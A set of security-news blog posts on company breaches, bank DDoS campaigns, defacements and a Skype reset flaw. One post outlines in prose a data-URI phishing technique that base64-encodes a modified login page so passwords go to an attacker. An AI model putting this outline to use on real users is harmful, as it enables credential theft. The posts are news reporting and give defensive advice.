Evernote Breached; Enforces Password Reset

Popular note taking service, Evernote has announced that they suffered a data breach recently. But thankfully, according to a blog post made at the Evernote blog, the hackers were not able to break into and access stored notes of individual users.

However, they did get access to usernames and encrypted passwords. Evernote stores passwords after hashing and salting process. So there’s little chance that even if the hacker did get the encrypted passwords, they will be able to decode the original ones.

Nonetheless, Evernote is asking its users to reset their password to ensure maximum safety.

After signing in, you will be prompted to enter your new password. Once you have reset your password on evernote.com, you will need to enter this new password in other Evernote apps that you use. We are also releasing updates to several of our apps to make the password change process easier, so please check for updates over the next several hours.

Evernote hacking is in the wake of a series of data breaches on high profile tech companies such as Facebook, Twitter, Microsoft, Apple etc. Now, they haven’t released any details on how the actual hacking occurred, but props have to be given to the company for quick action on their part in letting the users know about the hacking and taking actions to reset their passwords as soon as possible.

Twitter Suffers Data Breach; 250k Accounts Affected

Twitter has released information regarding a hacking attempt which has led to partial breach of around 250,000 accounts.

In a blog post, Bob Lord, director of Information Security states,

This week, we detected unusual access patterns that led to us identifying unauthorized access attempts to Twitter user data. We discovered one live attack and were able to shut it down in process moments later. However, our investigation has thus far indicated that the attackers may have had access to limited user information – usernames, email addresses, session tokens and encrypted/salted versions of passwords – for approximately 250,000 users.

Twitter will be notifying the affected users for resetting the passwords and their old passwords will no longer work. Now, if you have received such an email from Twitter, immediately change your password and make sure that it is a strong password. A strong password should have at least 8 characters, should be alphanumeric and should contain upper case letters, lower case letters and special characters. You could also use services like LastPass and 1Password to generate and manage passwords.

As of now, we don’t know how they were able to breach Twitter’s security. Twitter says that it was not an isolated incident and that the attacks were highly sophisticated. Just two weeks ago, major newspapers such as New York Times and Washington Post suffered data breaches which allegedly originated from China. So far, there are no reports that these attacks are linked.

Citibank and BoA Websites DDoSed by Al-Qassam Cyber Fighters

The new year has started on a disturbing note for Citibank and Bank of America (BoA), as Al-Qassam Cyber Fighters have started attacking them with a DDoS. The attack is not a surprise, as it was announced back in December last year. This is the second phase of their Operation Ababil, which started on 27 December, last year. The operation seems to have one agenda only — to get the controversial anti-Islamic video removed from YouTube and to stop the organized western offensive against Islam (if there is such a thing).

bank-of-america

The first phase of Al-Qassam’s attack took place in October, after which they took a break for Eid al-Adha. The list of targets for this second phase includes US Bancorp, JPMorgan Chase, Bank of America (BoA), PNC Financial Services Group and SunTrust. The hackers at Al-Qassam said,

In new phase, the wideness and the number of attacks will increase explicitly; and offenders and subsequently their governmental supporters will not be able to imagine and forecast the widespread and greatness of these attacks.

The hackers are extremely confident about their mission and have been able to cause temporary interruption of services in BoA and Citibank. While Bank of America has been attacked earlier in the first phase, Citibank is being attacked by Al-Qassam Cyber Fighters for the first time.

Citibank has announced about the disruption in service on its official Twitter account.

This hacker collective does not have any affiliation with Anonymous, and is one of its kind as it has risen to defend Islam, unlike other hacker groups.

Skype Password Reset Bug Allows Anyone to Hack a Skype Account

Hackers have discovered a new vulnerability in Skype that could allow anyone to practically reset any Skype account if the email associated is known.

The vulnerability which first surfaced on Russian hacker forums was first reported by The Next Web. The Next Web has verified the vulnerability and was able to successfully reproduce the hack twice. The hack basically includes creating a secondary account using the target’s email id associated with Skype. Using this secondary account, one can access the original Skype account and change the password of the target.

Microsoft has since acknowledged the issue and at the moment, they have taken down the Password reset page from Skype’s website.

We have had reports of a new security vulnerability issue. As a precautionary step we have temporarily disabled password reset as we continue to investigate the issue further. We apologize for the inconvenience but user experience and safety is our first priority.

This issue is only applicable to Skype accounts while Microsoft accounts which can also be used to login to Skype are safe from this vulnerability.

LG Smart World Hacked, User Information Leaked

A hacker going by the Twitter handle @Ur0b0r0x has breached LG Smart World, and leaked email addresses and password hashes of 11,316 users [Please see update below]. Smart World is LG’s official app store, providing apps for smart TVs, smartphones, and home appliances. The same hacker had earlier hacked 32 websites belonging to the Government of Columbia.

LG-Smart-World-Hacked

The hacked data dump has already been indexed by OZ Data Centa. If you want to find out if your info has been leaked, head over to ozdc.net and search for your email address. According to OZDC, the leaked information contains 11203 valid emails, out of which, 284 had already been compromised by some other data breach incident. Thankfully, LG was not storing passwords in plain text. However, I am not sure exactly what hashing algorithm it was using. If your account has been affected, immediately change your password on Smart World as well as all other websites on which you were using the same password.

Nothing on the internet is truly secure. Data and privacy breaches are often inevitable. However, you can avoid being burned by being prepared for the worst case scenario. Some of the elementary precautions are:

  • Using distinct, non-guessable, and non-dictionary word passwords. You can use a password manager like Lastpass to manage your various accounts.
  • Enabling two-step authentication on services like Gmail that supported it.
  • Using a truly secure secret question for password reset options.

Update: LG spokeperson reached out to us stating that LG has been unable to verify a breach. “Äs far as we know, no private or sensitive information has been accessed”, he added.

Extremist Hacker Group Takes Down Wells Fargo Website

“Izz ad-din Al qassam” has become quite notorious over the last few days because of its series of attacks on US financial institutions. Last week, they targeted The Bank of America, The NYSE and Chase bank. Their modus operandi is a DDoS attack, and it speculated that they are being sponsored by the Government of Iran. However, they have denied any such political affiliation. Just like Anonymous and its affiliate hacker groups, they have taken to Pastebin to announce their wins.

Wells_Fargo

Apparently, this is the second week of their operation Ababil, and they explain their operation as:

In the previous announcements, we stated that we will not tolerate insulting exalted character of the prophet of mercy and kindness. Due to the insult, we planned and accomplished a series of cyber operations against the insulting country’s credit and financial centers.

Insult to a prophet is not acceptable especially when it is the Last prophet Muhammad (Peace Be upon Him). So as we promised before, the attack will be continued until the removal of that sacrilegious movie from the Internet.

The hacker group has a “timetable” for this week’s attack, with Wells Fargo, the US Bank and the PNC websites scheduled for Tuesday, Wednesday and Thursday respectively. The “Izz ad-din Al qassam” group has claimed that these attacks will continue until the movie defaming Prophet Muhammad is removed from YouTube. The movie has already resulted in a lot of violence in Syria, and now this cyber-warfare against the US is taking further toll.

You can read this Pastebin paste for the complete declaration.

(Via)

Al-Jazeera Hacked by Syrian Hacker Group Al-Rashedon

Al-Rashedon, a Syrian hacker group has hacked a slew of Al-Jaeera websites for their reporting of the unrest in Syria. The hack affected Al-Jazeera’s English and Arabic websites, and left them defaced with this image on Tuesday.

al-jazeera-hack

The group posted a message to Al-Jazeera as seen in the image, saying,

In response to your stand against Syria (Government and the People) And your support to terrorist groups in addition to spreading lies and made up news.. We have hacked your website and this is our retaliation.

The Syrian hacker group accuses Al-Jazeera of spreading fabricated news and supporting armed terrorist groups. Although Syria has another known hacker group called the Syrian Electronic Army, there was no word from them on this hack. Al-Jazeera has not commented on the hack officially either.

Qatar based Al-Jazeera takes a lot of heat from dictatorial governments like Egypt, Syria and the Saudi kingdom for its aggressive coverage of the instability in the region. Al-Jazeera also saw an exodus of journalists over biased reporting of the situation in Syria. A few months ago, the official Twitter account of Al-Jazeera was hacked by Assad loyalists. The political scenario in the Middle East is quite tense and disturbing, and perhaps, Al Jazeera is being dominated by the Government to reflect its own foreign policy. However, this is a clear indication of what can happen in a modern day political war, where everything is driven by computer technology and is equally vulnerable.

Phishing 2.0; Phishing Without Fake Webpages

Nowadays everyone will be familiar with phishing attacks. It is basically the process of obtaining confidential information from a person by communicating with the victim (using emails, phone calls etc.) posing as someone else. The typical phishing attack includes creating a fake login page, storing them in a server and emailing the victim with the fake login page link. Now a new research paper from InfoSec student, Henning Klevjer shows how a hacker can create phishing attacks without the need for storing the fake login page on a server.

This method uses URI or universal resource identifier which is basically a string of characters that are used to identify a name or a resource. Using URI, the required data (the code for login page in this case) is stored within the URI with the following scheme

data:[<mediatype>][;base64],<data> 

Here <data> will contain the fake login page. The procedure for creating a phishing URI starts with creating a login page using the code from the original page.  The original code is modified accordingly so that the entered data such as password are sent to a location as desired  by the hacker. This page is then encoded using a scheme called Base64. Base64 is a method of encoding binary data to ASCII format which will increase the data size by around 33%. The next and the final step is to append this information to the URI.

The final URI will be extremely long and suspicious looking one. But as all browsers support legacy URI schemes, it will be rendered properly, as long as it doesn’t extend more than the maximum URL limit allowed by the browser.

Although, the large URI can be masked using a URL shortening service, Henning states that this method has some major limitations thanks to implementation of data URIs in Chrome and Internet Explorer.

You can read more about this method here(PDF).

Via: Naked Security

Information Security: Are we Evolving Fast Enough?

In the last two decades, we have seen a lot of changes around us. We have moved from standard definition to high definition content, dial-up internet to high speed broadband communication and our mode of interaction with devices are also changing with touch and voice input becoming more common. We have also changed our way of communicating and storing data. A lot of our data is stored online in the cloud and most of the communication is online through Twitter, Facebook etc.

Along with the aforementioned changes, our security policies are also changing. With us trusting more and more of our data with technology companies, it is vital for us to ruminate about their security procedures. In the early nineties, the security policies were framed based on the core principles known as CIA – confidentiality, integrity and availability. But times have changed and so have the bad guys. We can no longer rely on the old principles alone. Our security policies have to evolve and that too fast. But are we moving fast enough? Let’s take a look.

Just a few weeks ago, WIRED editor, Mat Honan’s iCloud account was compromised along with his Amazon account. Using the hacked iCloud account, the hacker remotely wiped data from his iPhone, iPad and MacBook. How was the hacker able to do it? Shockingly, just by calling Apple customer support! The hacker was able to get all of the information required to take control of an account from the internet and Amazon using social engineering. You can read the entire story here.

This is just one example. You can find a number of incidents like this. Interestingly, most of today’s attacks use social engineering as the preferred method. But have the technology sectorw evolved enough to protect themselves and customers from these type of attacks? The truth is, while certain companies are trying their best, most or a lot of companies do not think outside the box. In a SANS white paper titled “A Multi-Level Defense Against Social Engineering”, David Gragg quotes Keith A. Rhodes, chief technologist at the U.S. General Accounting Office as follows.

He notes, “Very few companies are worried about this. Every one of them should be.”

Considering that a large number of attacks in 2011 were using social engineering, we can easily conclude that his words are very much true. Still, the unfortunate truth is that companies are not training its staff on detecting social engineering tactics. For example, a large number of tech companies rely on personal information to reset password. At the current age of social network, that information is fairly easy to obtain as shown by the Mat Honan incident. By not taking our current technological ecosystem into consideration, these companies are effectively creating a loophole that the hackers can make use of.

But every time a data breach occurs, can we blame the company or the client? Ted Claypoole, author of ‘Protecting Your Internet Identity: Are You Naked Online?’ says that at certain levels, preventing hacking is just impossible.

“Everyone is hacked.  Sometimes a company has a big loss, and other times smaller losses. But professional criminals are testing weaknesses all the time, technology changes constantly, and all businesses have been a victim, or will be a victim. Some never know it.

There is no such thing as impenetrable security.  For a thing to have value, you must be able to use it.  And if you can reach it to use it, then so can a bad guy.  Sometimes they impersonate the account holder.  Sometimes they take jobs inside the company and become the security flaw.  Sometimes they exploit the technology.  But every company has “insufficient security policies” by your measure, because every company is vulnerable. Anyone who tells you that their major company has never been breached is either lying, naïve or both.

Last year a hacker, probably foreign government sponsored, broke into RSA, one of our very top security companies, and took information that could allow the hackers to hack defense contractors (like Lockheed Martin).

Our financial protection from harm lies not in company security policies, but in the system itself.  This is why we have a $50 fraud limit on our credit cards, and why, when someone breaks in to steal up to $100,0000 of your money from the bank, they did not just steal your money – they either stole the bank’s money or the government’s money, and yours will be returned.  The system eats billions in fraud each year and we all pay a little bit for it, so that the losses are not as unevenly distributed if it happens to you. So I question your assumption that companies who are hacked have insufficient security policies.  Resources are limited. We can all spend only so much time and money on security.  Sometimes you can have the top security in the world, and the bad guys are simply better.”

And that is certainly true. At times, the bad guys are just too good for us to prevent an incident. But that shouldn’t deter us from creating strong security policies and training our staff to prevent incidents such as the one that happened to Mat. The truth is that most of the time, the data breach would have been completely avoidable (96% of breaches in 2011 were avoidable according to Verizon Business Data Breach Investigations Report, 2011). For example, Microsoft India’s online store was hacked last year and password and credit card data was stolen. Apparently, the company that managed the store on behalf of Microsoft didn’t even bother to encrypt the passwords making the hacker’s job a walk in the park.

So what can we do to improve our current security infrastructure? What we need is a holistic approach in dealing with creation of new security policies considering the latest trends and method of attacks.  The policies should evolve fast enough as the attack vectors evolve. Now this is not an easy thing to do but it has to be done in order to safeguard our data. We could have an internationally valid security certification process similar to the ISO  270001 certification which analyses the security policies and practices of a company and rates the company on behalf of their policies. This will help customers in selecting the best in terms of security and will give the companies a necessary ‘push’ in framing the right policies.

Furthermore, the government can pass laws that prioritize the safeguard of consumer data. Unfortunately, there is no solid law in the US that focuses on protection of consumer data, says Ted. “Lawmakers in the United States are doing very little to force protection of user’s data. Other industrialized nations believe that data privacy and data security is a human right that their citizen’s hold.  This country does not yet acknowledge any such right.  We have laws protecting certain specific classes of information in certain circumstances – some health care data, financial data, and children’s information – but our data protection laws are confused and disjointed.”

While Senators are trying to pass laws such as SOPA for the benefit of the entertainment industry, it would be nice if they could spend a little bit of their valuable time in making solid laws to protect our data and as well as our identity online. Only effective security policies along with strong laws can bring about durable changes in the security infrastructure so that we can sleep tight without worrying about our data.

Spam Wave hits Dropbox Users

Posts of frustrated users are pouring in at the Dropbox forum about receiving spams at email accounts connected to Dropbox.  Posts such as the following have been coming in since yesterday.

since today, I receive spam from [website link clipped] to an email address, that is in use at dropbox only ([email protected]).

So I guess you have a security problem with your useraccount data. And this sucks a lot.

Although it is possible for spamming software to randomly select email addresses to send spams, the number of affected users indicates some kind of breach on Dropbox’s side.

The initial reply from the Dropbox support was as follows,

Generally, it is possible that these email addresses got released to the general population when you either shared a folder or sent a referral invite. When you send these to other people, your email is attached in the reply-to field and it is possible that a compromised referral could have gotten their address book stolen by spammers. This is the most likely scenario.

But, apparently, users who haven’t used the referral system have also been receiving spams. This spam wave might be a result of a compromise of Dropbox’s mail server, but we can’t be certain of it yet. Last year, a security glitch had allowed anyone to login to any Dropbox account with an incorrect password.

We have contacted Dropbox to know more about the situation, but haven’t heard from them yet.

UPDATE: A spokesperson for Dropbox has sent us the following statement.

We‘re aware that some Dropbox users have been receiving spam to email addresses associated with their Dropbox accounts. Our top priority is investigating this issue thoroughly and updating you as soon as we can. We know it’s frustrating not to get an update with more details sooner, but please bear with us as our investigation continues.